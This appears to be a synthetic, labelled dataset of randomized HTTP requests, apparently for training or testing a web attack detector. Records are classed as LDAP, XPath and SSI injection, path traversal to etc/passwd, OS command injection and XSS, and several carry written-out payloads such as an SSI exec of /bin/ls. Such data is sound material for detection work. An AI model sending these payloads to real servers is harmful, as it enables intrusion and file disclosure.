~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37818
Start - Id: 38133
class: LdapInjection
GET /Ud6d/yUMOGQtENzvZ6xxb49f/WXNTq7QK.bhP9tl/kRUz/7p69kO.63ja1D1/aPdZ-qTd0qHr/la8coyui/Hms_1rmFMWg/tbaeeetdi/aq1/ioairoriereadah.msf?eneies=25004808&9iuoeo0l=8763&sqonez=ifttbgsoundyaehconnectbode+xe&aeaau5h4d3hItUk=53090618&3uUA2mlra6iknmc=rsf%29%28%26%28objectClass%3D++iim*%29 HTTP/1.0
Host: 163.170.19.156
Connection: close
Accept: */*;q=0.4
Accept-Charset: cp-936;q=0.6, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: 1iio-d7, h8mto-vtnnn4;q=0.6, hre-2t4hh
Cache-Control: no-transform
Client-ip: 77.198.39.254
Cookie: e6ei=bhtpass;hwdeecmieyoxR=[fe-euaah\lkstdins'tt n;ghsdfhqdd=linkyv;ueoreary=8;k-DR0W-=uasystem-( lh2mfecj;aylfielfsu=having84
Cookie2: $Version="146"
Date: Tue, 17 Oct 06 14:41:14 UTC
ETag: W/"E9eWP5kbo7V4.VA00kBy"
Expect: 100-continue
From: ttste@rra4euq0.de
If-Modified-Since: Sat, 07 Nov 09 02:14:59 GMT
If-Unmodified-Since: Sat, 12 Jul 08 04:44:13 GMT
If-Match: "CnOKubaYehQ48nND5sG"
If-None-Match: "fzS1T2Fqy8lTDSXiaj@"
If-Range: "weOV50F1vup0rw5@6eHg"
Max-Forwards: 5383
MIME-Version: 0.5
Pragma: lOe3=bwe
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: Basic c29vb3B0OkVlbGUwaFA=
Range: 17768-5
Referer: /oi8fdt/ebimT8o5/iacn/Eht8/aeie.php
TE: trailers,deflate
Trailer: From
User-Agent: Lrketeqcfocr
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2471x139
Via: rtw/3.1 www.mnre7wpe.png, HTTP/3.4 221.98.149.229
Transfer-Encoding: identity
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 919 84.81.58.238 "tamueesan" "Sat, 10 Feb 07 17:27:43 GMT"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38133
Start - Id: 44896
class: PathTransversal
GET /3KaBY/xYKFYLOEOl21styleeval/tnilSNlv5TwHUnnv5/edEnbiwnsnhuaae.tiff?Hflpegdean4zhrs=tet2jY5l&vLZVqq0Bi=.%2F..%2F..%2F..%2F..%2F..%2F&GHVCVWY=58&Tetsi=7890448704&nynoo35nk=lEaz0c HTTP/1.1
Host: www.diRfetewu.st
Connection: htiosisw
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: m9RTrae-dnny;q=0.6, h-2sdBxR, s-oabNyrih;q=0.4, eito9nt-d9;q=0.1, dzZr-pe
Cache-Control: no-store
Client-ip: 139.102.255.156
Cookie: aeeytni3ciUrae=bUaeEilxsteheei
Cookie2: $Version="65"
Date: Sun, 11 Sep 05 16:44:15 CET
ETag: W/"tIHhbmSuiGV1mULHe7Fs"
Expect: eaqhh8
From: setPoitm@ioa6tb8.uk
If-Modified-Since: Tue, 13 May 08 08:39:40 CET
If-Unmodified-Since: Thu, 26 Oct 06 19:30:25 GMT
If-Match: *
If-None-Match: "Vz.sAU1CML7rsrbV89"
If-Range: *
Max-Forwards: 10
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: NTLM ZG93bmRvZXJzaWN0ZUx0ZVRlMGtvZUw1cmFzZWVmcHQ4SDcw
Range: -129
Referer: /enoi/ens3ter/ttsswe/AcrLAbh/eelr.dll
TE: deflate,deflate,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: uocaeoJa (tiVcVCB86N; cePy.wf; n88vPo-YC; eoec-1rt; ejyu-hib)
UA-CPU: StrongARM
UA-Disp: 7572,678,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6797x3315
Via: HTTP/5.2 5.190.245.126, 9.6 247.140.109.190
Transfer-Encoding: identity
Upgrade: yr2s/6.7
Warning: 118 www.ioLnarno.css "eelowsyOstqsreyn6" "Tue, 10 Oct 06 11:17:40 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44896
Start - Id: 48364
class: XPathInjection
GET /feefe/E4null/AUyJT.mcmailP0passthruV.php?1P7W@=yTrcbp%27nhl6e5&ttrp=0sock_streame+Lar HTTP/1.0
Host: 165.70.249.88
Connection: close
Accept: */*
Accept-Charset: x-mac-korean, iso-8859-3;q=0.0
Accept-Encoding: peihcs'    or    6 <    count(path/child::*)  or   'vuZTi'   =   '
Accept-Language: wEqrr-n0eiy;q=0.1
Cache-Control: no-cache
Client-ip: 204.16.216.80
Cookie: -80.oU-telnet_M=otNbhzJ;NptnorpHe=aEh;we=jdiv0R
Date: Sat, 08 Nov 08 10:57:58 GMT
ETag: W/"fQmWw7eDu8Bmr7To-5_"
Expect: 100-continue
If-Unmodified-Since: Fri, 28 Dec 07 18:33:40 GMT
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 1.1
Pragma: no-cache
Authorization: Basic ZWFpbTpyZXFu
Referer: /srtI3.php3
TE: trailers
Trailer: User-Agent
User-Agent: 5UEil8Qk http://www.LW2et.de
UA-CPU: PowerPC
Via: 6.8 100.174.240.5, dsoo/7.0 www.7d7e.htm
Transfer-Encoding: rafv
Upgrade: oYebo/5.6, cRh/6.8
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48364
Start - Id: 37778
class: LdapInjection
GET /tYN6/eiozEmita1s/FjQDperlEyn/ncingbhs/-2G5/s6icsees/WbibcH.exe?9ZHNsqpmjoad=ulea2dzhI%25encAd&ricr9ihsoet=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&18mR=d6s0 HTTP/1.0
Host: 246.54.217.127
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 233.194.90.144
Cookie: detCrlye=mre;4aoccnt=506276;RvIKDo=4
Cookie2: $Version="7"
Date: Mon, 10 Sep 07 08:38:25 UTC
ETag: "K8JclCYhB4_YHqlv"
Expect: vaQg=itklittE
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Tue, 06 Dec 05 23:23:38 GMT
If-Unmodified-Since: Thu, 16 Jul 09 01:49:31 GMT
If-Match: *
If-None-Match: *
If-Range: "hRjFaauAC5PB2Vogk"
Max-Forwards: 6174
MIME-Version: 3.2
Pragma: korOTptL=uDVdrDr
Proxy-Authorization: ohdon nEbfg=9sctk
Authorization: Digest cnonce="aw1stewt"
Range: 942-,92-,07-63
Referer: http://www.Ooeteuoo.gov/OaTwe/liass.swf
TE: gzip,trailers
Trailer: Range
User-Agent: Mozilla/2.9 (Windows; U; Windows NT 6.6; Gt-7a; rv:8.8.2) Gecko/17404058
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 807x162
Via: 3.2 www.dsrs.js
Transfer-Encoding: gzip
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 289 www.ftohdi3b.jpg "ticbzu" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37778
Start - Id: 37473
class: LdapInjection
GET /nC31dp2nWoQCvo/isaoeteH4argn/dm4d46icturnh6/nwp@1OHO_7/LIVBx92m/eTcAdOhcYYoPMxyz@gD/oe4ha/u4QlQky_f/HYFSzvt/yRW0O7iR-a9lhx@O/e1dwwDOcVCK/dE.js?pHa96Ifnrpe=utn3gselectnWiFlocationSTa&6mhaisLeyls3=016146035&inCRNxgECm=3009883&Fne2hzotcxe4=ne HTTP/1.0
Host: 76.7.199.32
Connection: close
Accept: image/*;q=0.0, text/*, video/mpeg
Accept-Charset: iso-8859-8-i;q=0.1, windows-1255
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Cookie: linkeW9bz5Xsas=rwannhnr59E;QQY.sautoexec-libg=9;oRBAeaekRrrriar=evS1b02k8kd;5esat=) (  |    (displayName=had*)    (name= had* )(   mail=had*   );nGlrsEroth5rWmt=nDID5e;dszt3e=[
Cookie2: $Version="9"
Date: Thu, 23 Mar 06 08:12:06 UTC
If-Unmodified-Since: Fri, 26 Sep 08 09:05:57 CET
If-None-Match: "_9FN2dRVeKdjDjujO@"
Max-Forwards: 93
MIME-Version: 5.3
Pragma: dyf4Rg='shas'
Authorization: NTLM MTJzaXVzcERlZWQzbHQwZm44ZXRlZjByNmEyZW1jc2FkaGJzcDlRdGxibHRp
Referer: http://www.idahuE0.org/g1hbSbel/ecels/taie5A/eazSdHoA/tnricy.cgi
TE: deflate;q=0.2
User-Agent: Mozilla/1.4 (X11; U; Solaris 7.1; ra-fi; rv:4.0.5) Gecko/89598219
Via: 9.0 76.19.75.146:2
X-Forwarded-For: 85.93.81.59
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37473
Start - Id: 39938
class: SSI
PUT /.IMj3vNN.htm? HTTP/1.1
Content-Length: 234
Content-Language: ter
Content-Encoding: identity
Content-Location: /yoa3tten/htrie/YnE3ekh/djnres.pl
Content-MD5: cG9zN3JjZHNtdGpvZXFkbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Feb 10 03:05:33 UTC
Last-Modified: Fri, 04 Aug 06 22:32:48 CET
Host: www.eoierHbaai.biz
Connection: keep-alive
Accept: image/*, audio/*;q=0.9, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: u=fncnji
Client-ip: 241.54.246.2
Cookie: rhebppnob=oadminIc;d.BIf0wkpLBS=52905;VDND0dP1CH=91621;xr=c5wrmobooeib6su;eerrU=ape 3lstylenouwhereehome8gidinclude>d
Cookie2: $Version="17"
Date: Tue, 27 Mar 07 14:19:22 CET
ETag: W/"FUfyGk1ujuNeF.2u"
Expect: 100-continue
From: 2nbiytae@onefd75.cz
If-Modified-Since: Tue, 14 Feb 06 11:35:57 CET
If-Unmodified-Since: Wed, 17 Dec 08 01:18:58 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 07:21:58 UTC
Max-Forwards: 298
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM bmVyaWFlaGtkdHRhaWFvM0lpNG9hYW9lMmRlZXRyYXNjag==
Range: 065804-4,-22740,4181-
Referer: /ane0/tsct.mp3
TE: trailers,gzip,chunked
Trailer: User-Agent
User-Agent: Mozilla/7.7 (Windows; U; Win98 0.6; gt-eu; rv:7.0.8) Gecko/29271394
UA-CPU: 68000
UA-Disp: 243,0955,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 625x1975
Via: 6.2 31.0.86.28:09, HTTP/9.0 www.e0gt.css
Transfer-Encoding: azsrz
Upgrade: awoh/8.2
Warning: 471 61.54.109.103 "OTamdaleob" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Bna4=<!-- #exec  cmd="/bin/ls    -l  /home/eit/ruei"     -->&rm8e8dsme6sOb=-xoask6cp&OgPe32@Zk8=731259&nh=zlatcq&amnbi3oa=si&CxzoSM=h0httpsaE%eia%oh&iEtashtr9d=e2&2iato=hojsOon&dmnz-kfP8rIV=aqea&mkree=aandt

End - Id: 39938
Start - Id: 43779
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: 169.184.57.13
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.8, cp-950;q=0.0, euc-kr;q=0.8, iso-8859-3;q=0.3, big5
Accept-Encoding: deflate, compress
Accept-Language: 3i-ma;q=0.6, fnl-ewXes;q=0.3
Cache-Control: min-fresh=31950
Client-ip: 111.17.94.212
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="47"
Date: Mon, 25 Apr 05 24:16:42 GMT
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: aetnnif=Omsa3m
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Tue, 08 Jun 04 18:22:45 CET
If-Unmodified-Since: Tue, 27 Oct 09 07:02:17 GMT
If-Match: "XhMLQzAyv1sJ7vEf"
If-None-Match: "cguqaf3NHWHjefI-DQ1"
If-Range: Mon, 09 Aug 04 08:31:48 CET
Max-Forwards: 5
MIME-Version: 7.5
Pragma: hria=r3ttds
Proxy-Authorization: Digest opaque="leSssie"
Authorization: ifna sietuw=6ratieE
Range: 10571-03
Referer: http://sieyeeoW.fr/iApqetib/pNdao2/ero3rsei/linn0.exe
TE: trailers,trailers,trailers
Trailer: From
User-Agent: w6Egthttito5W21fnt
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1293x0631
Via: 0.1 84.137.108.135:115, 7.5 www.al0m.js, FTP/9.4 www.tigtruei.html:36627
Transfer-Encoding: compress
Upgrade: I0e/5.0, he1tw/5.8, cacYt/4.6, L6nei6/8.5
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 144.180.167.11
X-Serial-Number: 026026261334603
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43779
Start - Id: 46490
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: 93.214.70.124
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 137.78.176.107
Cookie: daYr5owIor=937466424;dQTfbde=88;icen=u5qBq;cbecx= 'sbtaC%u/ddhome2aiinscriptw;gi8=hd7eis6oddfnmro
Cookie2: $Version="5"
Date: Wed, 03 Mar 04 09:27:56 GMT
ETag: "XgEaHknSpO0avcsEQ"
Expect: ith49hei=hrdod6si
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Wed, 31 Oct 07 16:42:45 GMT
If-Match: "Pb3R.6N7qComnliTXbQ"
If-None-Match: *
If-Range: Sun, 25 Feb 07 09:32:05 UTC
Max-Forwards: 2234
Pragma: no-cache
Proxy-Authorization: detou Jxsacw=pheC
Authorization: ysn04a eecj4=Nyasx
Range: 0-48
Referer: /lddafap/inejeu.doc
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: nsiden2dnrtterOro
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: 0.5 www.o9qe2l.htm, hfe9ia/0.7 www.skhsc7.js
Transfer-Encoding: compress
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 616 www.HiVsl3ns.js "wiis9esdak" 
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 46490
Start - Id: 36297
class: PathTransversal
GET /t9etieatxtrafd6mpes/hlQ_Pm/2DtGIrCsI_s4A/inibSeced.sh?tiEeteomh=63197812&w3toswreeouee7=aw%299i5nezc8l%2Faf&Lp2wHdoOqs=030464&Ttt=5971452&aVQJdsZ-of=0135467&syemHceTsemhei=esrtb+il%2Bltnls&orqJeJlikeej9=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&emamiindhoano=eOCyRnB-&asqmgstenq=usOyXza.&43VexecUxq=recS%2F&seub=%5Dwnph-%24cemi4siescript HTTP/1.0
Host: 107.232.118.196
Connection: keep-alive
Accept: audio/*;q=0.2, application/postscript
Accept-Charset: euc-cn;q=0.4, x-mac-arabic, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=96501
Client-ip: 114.100.144.6
Cookie: ecabnt=689900144;seXNl0e=02413;hn=4binpdsIrEslrnS;0Pstlb=wBxT_t8l@;dtorFntro6=944
Cookie2: $Version="483"
Date: Sat, 13 May 06 22:44:41 CET
ETag: W/"_CMpMj-5Yq9_H_Af87"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Fri, 30 Oct 09 11:07:23 GMT
If-Unmodified-Since: Mon, 05 Jul 04 19:09:17 UTC
If-Match: "v3q.-skfEvEP1swC"
If-None-Match: "JXAedA1i-p0PTnP"
If-Range: Tue, 15 Dec 09 10:21:51 UTC
Max-Forwards: 8
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic Ym1uYTpkaWVmc2Nv
Authorization: redos fom8e=eedAs
Range: 9-463
Referer: http://www.eaoauu8t.biz/ssdeY8O.cfm
TE: deflate;q=0.8,deflate,gzip
Trailer: Host
User-Agent: Mozilla/4.1 (compatible; ibgc; SunOS sun4u; h3toddmI7d)
UA-CPU: MIPS
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: FTP/9.7 www.natloni.gif:160, onss/3.3 178.225.174.18
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 777 www.eraf47ht.html "lzrhseSsp9edvonjaeyx" "Fri, 05 Jun 09 03:03:54 UTC"
X-Forwarded-For: 142.213.134.120
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36297
Start - Id: 37128
class: LdapInjection
GET /dgt6/gvselectbdmFJBEdiv4/nsbetvatehprbl/6nrbg9jmeErjaatg/r7RA2036PH8D/iJBip9NklSk41vanPS/hqa.swf?eo4pesep=g6eosF6f_tE&nM3tBmdN=69%29%28%26%28objectClass%3Ddlt%29%28%7C%28sn+++%3Dcll%29%28cn%3DOgss+J*%29%29&wtmpfveJ=cwfIqHbES&sehqkntey6slc=6346138&ec1sUaeetktiiqx=23300879&82VVxXnKyV=lteYsar&ihmrsmy=yoiuve+sz&ooE2=rsystemuw&oEwr0rne=eaV5R&DshRi3a=ewDrkheC HTTP/1.0
Host: www.odothfarri.fr
Connection: close
Accept: audio/basic;q=0.9, text/*, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a8ydhi-e;q=0.4, wdaer-i4;q=0.4, Ceiu2pw-7, h-itot;q=0.6, w-aE;q=0.4
Cache-Control: no-transform
Client-ip: 55.97.57.216
Cookie: 0hnreid=aeeoav2ep0tliohBSc;ssIse6cheteaid=Aorwb77etsasth
Cookie2: $Version="74"
Date: Sat, 06 Feb 10 04:36:34 GMT
ETag: "vNIt9YlB_Kqpv93dComl"
Expect: seeuhtcr
From: ke6iat@otEmem.org
If-Modified-Since: Tue, 22 Jul 08 20:27:35 CET
If-Unmodified-Since: Sun, 22 Feb 09 18:31:05 GMT
If-Match: "NWUacDANaM1MCVjM"
If-None-Match: ".kf_KyC@ctRwzdYhEfrw"
If-Range: "Ih2PkZJ0miHsL15hnx"
Max-Forwards: 389
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: see9 isegk=eecbta
Range: -5173
Referer: /tsvifo/m5opycu/d7moorp/hEai8hC.txt
TE: gzip,deflate
Trailer: Accept-Language
User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 6.4; uk-am; rv:7.4.1) Gecko/19096169
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 9NPM/8.8 56.150.250.140:40544, FTP/0.4 www.norh.js:3, 0.4 77.78.133.180:6
Transfer-Encoding: deflate
Upgrade: tRvc9/2.0
Warning: 290 81.121.41.20 "1erpeehEtorXv" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37128
Start - Id: 40429
class: SSI
POST /QQ._Q_m40.gif? HTTP/1.0
Content-Length: 304
Content-Language: ehtdier
Content-Encoding: gzip
Content-Location: /uemu1/cd8ss3cL/mtll.swf
Content-MD5: aGFpZWFyN2phbmR1MGdhMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 22 Apr 08 01:25:12 UTC
Last-Modified: Tue, 29 Sep 09 03:21:58 GMT
Host: www.yOhyadAuem.com:3012
Connection: z4ev
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: compress, compress, deflate
Accept-Language: *
Cache-Control: max-stale=43
Client-ip: 210.34.220.164
Cookie: yhtmOarisda=ittsboof;e8t0tkalL=68435;6DOuuauxs=is eains/hcmdje qigo;ntrnewamspa=ep0Drd
Cookie2: $Version="63"
Date: Mon, 04 Aug 08 12:36:00 UTC
ETag: W/"qylo401A2MzfwYt4gbE"
Expect: ppvi4Cse
From: ssiur@ovoEteblT.it
If-Modified-Since: Mon, 19 Dec 05 09:18:36 UTC
If-Unmodified-Since: Mon, 31 Jul 06 13:38:34 CET
If-Match: "_7fyyKu2nFl-6A8VPB9"
If-None-Match: "Aizt1zFBiXUB@fh3r8r-"
If-Range: Fri, 20 Nov 09 08:19:54 UTC
Max-Forwards: 32
Pragma: 1hb=o
Proxy-Authorization: Basic eHNzNmNjOnY3dGlodHU=
Authorization: NTLM dGFpOWxvZGNsc2VkRGY0YW9ydWVlZ2VvZWxtZW8zZXRvaG9lc25FdGxhSEQ=
Range: 35-1,0691-
Referer: /jhkhts.wav
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.9 (compatible; acsswcuret; Win 9x; aoIwnhaw0; oypAkoos)
UA-CPU: Sparc
UA-Disp: 6530,0907,16
UA-OS: WinNT
UA-Color: color16
Via: HTTP/4.4 www.eheiswMv.gif
Transfer-Encoding: compress
Upgrade: ssho/3.1, nrn/6.3, eejp1c/6.4, yds/5.4, diMtw/4.2
X-Forwarded-For: 55.189.138.51
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nwReelFh=u%csnpdl$o5 &a1hasThnyt=22&oe6oema=<!--  #include   virtual="d:\windows\autoexec.bat"    -->&pnt=al'rZpz&vmnapecblrjeee=home&oahsmerrEw=asdildxelaelreTzF&ginZ=354&e2o8=sjiFmz&8r=3access_logorwti&es=1051078724&CI1i=lUMhVcN3Z2I&hjisvfSWitoqr=3winntxml&acdtep0laHalyXa=277

End - Id: 40429
Start - Id: 38618
class: LdapInjection
GET /EaetsldRtr8/z_VkK9jP@f.asp?EslWx3mXw2=4&1OCB8Qsxp_krL=yAm%29%28++%7C++%28etoLe%3D*%29&etiopAnm7s=t3csyua0e&us=%40a%3Diob+ohan%3EErA+os&rHgjx4ceceiru2g=gs1&ip_S=Qe6n&ewnlentoUOL=ta%27xterm4&pnjCtmt=0dnetcattelnets+&ee3Ioe=aeio&3e__node2l=wegWt&tnz=uO-&8-ojV7qB=28&3w2GR=956644&h6FrnEMzrs1qnEr=151&5maenjeuirsrfdA=588792 HTTP/1.1
Host: www.ssee.com
Connection: keep-alive
Accept: video/*;q=0.2
Accept-Charset: koi8-r, iso-8859-3
Accept-Encoding: 
Accept-Language: eerHa-ruc, eh1h3e-eldns;q=0.8, moWenl-4eilei, 2rbhhle-ohiA;q=0.0, n2iwrm-7d6ookIa
Cache-Control: no-transform
Client-ip: 54.188.209.237
Cookie: C6H0is=aLEiexectt/prLctmp;ve2mto=3a;tei3Y3mcms=t3etn0icpg;jc98odu=r0o-kt8nw8likeinnacE
Cookie2: $Version="2"
Date: Wed, 03 Feb 10 17:35:13 CET
ETag: W/"78VQV6Gzdd4iSe."
Expect: 100-continue
From: hlpn3e9@tbllex.fr
If-Modified-Since: Sat, 09 Feb 08 21:05:11 GMT
If-Unmodified-Since: Tue, 02 Oct 07 15:54:54 UTC
If-Match: "CFnN3qlGyaNj@Mz"
If-None-Match: "sjSn5qbZ3i5NKpNA"
If-Range: "2nrs__Eu2QeAlWIfe7Y"
Max-Forwards: 5
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: NTLM ZGk5aGVhQXRzdGRjZXlBaWd0ZXB0bzhuMG1ib3NvbnA2bG5h
Range: 863-0,-075,-8921
Referer: /cjjr.bin
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: dtgrFIea8i7enpne
UA-CPU: x86
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: 3.0 www.lntsudh.jpeg, FTP/4.1 8.52.254.109, 6.5 www.6egGeA.gif
Transfer-Encoding: identity
Upgrade: rpeyc/9.4, l7e/9.7, Ouhf/0.7, rzONo/2.0
Warning: 221 www.yahrm.jpeg "dsaeopr0wq2uo" "Thu, 14 Jul 05 01:23:19 CET"
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38618
Start - Id: 38738
class: LdapInjection
GET /QoDal9/vBJXz6Qj5yl/n5Wm94/xPVM/zOefectufu19we/hbjsicoOtaes.cgi?ysidh=fh&T7HAsfi=ttiolibpasswd%26i&tV2-=th%5Dtjt&enge2d=0&ffm=%29++%28++++%7C+%28++++cn%3D*o+++%27brien*+++%29%28mail+++%3D*o++++%27brien*++%29++++&nlmuoyelf4inOa=9hnyiEwertjlts&btmhcc=eicsrxeNohS5aersnt HTTP/1.1
Host: 67.218.41.218
Connection: close
Accept: audio/basic;q=0.6, audio/basic
Accept-Charset: iso-8859-2, koi8;q=0.6, windows-1257;q=0.4, x-mac-roman, shift_jis
Accept-Encoding: deflate, gzip, identity, identity
Accept-Language: *
Cache-Control: hnohir1='tr'
Client-ip: 62.92.248.134
Cookie: iOs5G9=62936763;In1ps=2
Cookie2: $Version="97"
Date: Mon, 11 May 09 17:40:44 CET
ETag: W/"wYpnHj9DHaQ5NK@n"
Expect: Eirzruo
From: BtenoI@9Rnek.gov
If-Modified-Since: Wed, 17 Oct 07 04:58:58 GMT
If-Unmodified-Since: Sat, 15 Aug 09 09:56:25 GMT
If-Match: *
If-None-Match: "KJ@.FoCGdiCsCQfMtxT"
If-Range: Sun, 14 Sep 08 02:47:53 GMT
Max-Forwards: 22
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic eVRzbllhY2U6aXN0bw==
Authorization: Digest opaque="eJotl"
Range: 22791-
Referer: http://www.nne46ebi.st/hnamRe/uroe.doc
TE: trailers
Trailer: Authorization
User-Agent: y9ies/2.1
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 094x3377
Via: 0.9 www.remams.png, 1.9 www.iiipubNl.shtml
Transfer-Encoding: deflate
Upgrade: 5esn/7.7, ztlS/0.9, er6/2.0, rdryli/6.5, mla/1.5
Warning: 815 www.sni22ed.shtml "iihdw6iguibnuR" 
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 320181381664910
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38738
Start - Id: 35699
class: XPathInjection
GET /tuf_ufw47lhksrGx/ralPmVcGBVwuQ0Nmw/90b4Fg1ImZa34CeQ1b9Z/Mffegebuuaer/naZ6s3_S9zYVzZ7xVNnv/gnLyF/rndtEgqITrntmrret/dmetaK/45ueuomtonpeucigd/sr.shtml?hO6mhA8eb=nt5%27+or+%28i++%3C+++count%28poa9%2Fchild%3A%3Atext%28%29%29+++and+++++j+++%3C++++count%28rvat%2Fchild%3A%3Acomment%28%29%29+++and+++k++++%3C+++++count%28retyIf%2Fchild%3A%3A*%29+++++%29+++++or+++%27msxelbe%27%3D+++%27+++taetsnn%27++++or HTTP/1.1
Host: www.nrunddaf.com
Connection: keep-alive
Accept: audio/x-wav;q=0.1
Accept-Charset: us-ascii, us-ascii, iso-8859-3;q=0.3, x-mac-turkish;q=0.6, iso-8859-1;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=347
Client-ip: 87.168.72.128
Cookie: goprlu=nnsnwi9wosce;alys=eolauvE6ftby
Cookie2: $Version="0"
Date: Sun, 18 Mar 07 03:56:27 UTC
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: aebhq
From: xcsXifnE@tneljth.ch
If-Modified-Since: Wed, 11 Jul 07 16:10:40 UTC
If-Unmodified-Since: Mon, 04 Apr 05 09:11:15 UTC
If-Match: "9SMOh.t3Qo30zFdUc"
If-None-Match: "rlzk8rqxdGrIZMUJF"
If-Range: *
Max-Forwards: 5360
MIME-Version: 4.6
Pragma: Qns=8p8b8
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: NTLM ZWtucHBJbW50dHN0YnJlZ2Nub3RpZUVjZXUyZGE5Zzh5c1I=
Range: 5225-,8-9,1-
Referer: /wdwo.asmx
TE: chunked,deflate;q=0.6,deflate
Trailer: If-Range
User-Agent: Mozilla/2.3 (Windows; U; Win98 1.0; 4s-MS; rv:1.6.4) Gecko/77124804
UA-CPU: Sparc
UA-Disp: 9150,2216,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: FTP/3.8 176.165.200.193
Transfer-Encoding: identity
Upgrade: dOa8/7.7, iisei/3.4, ylle/7.0, laix/9.7, vbeu/5.2
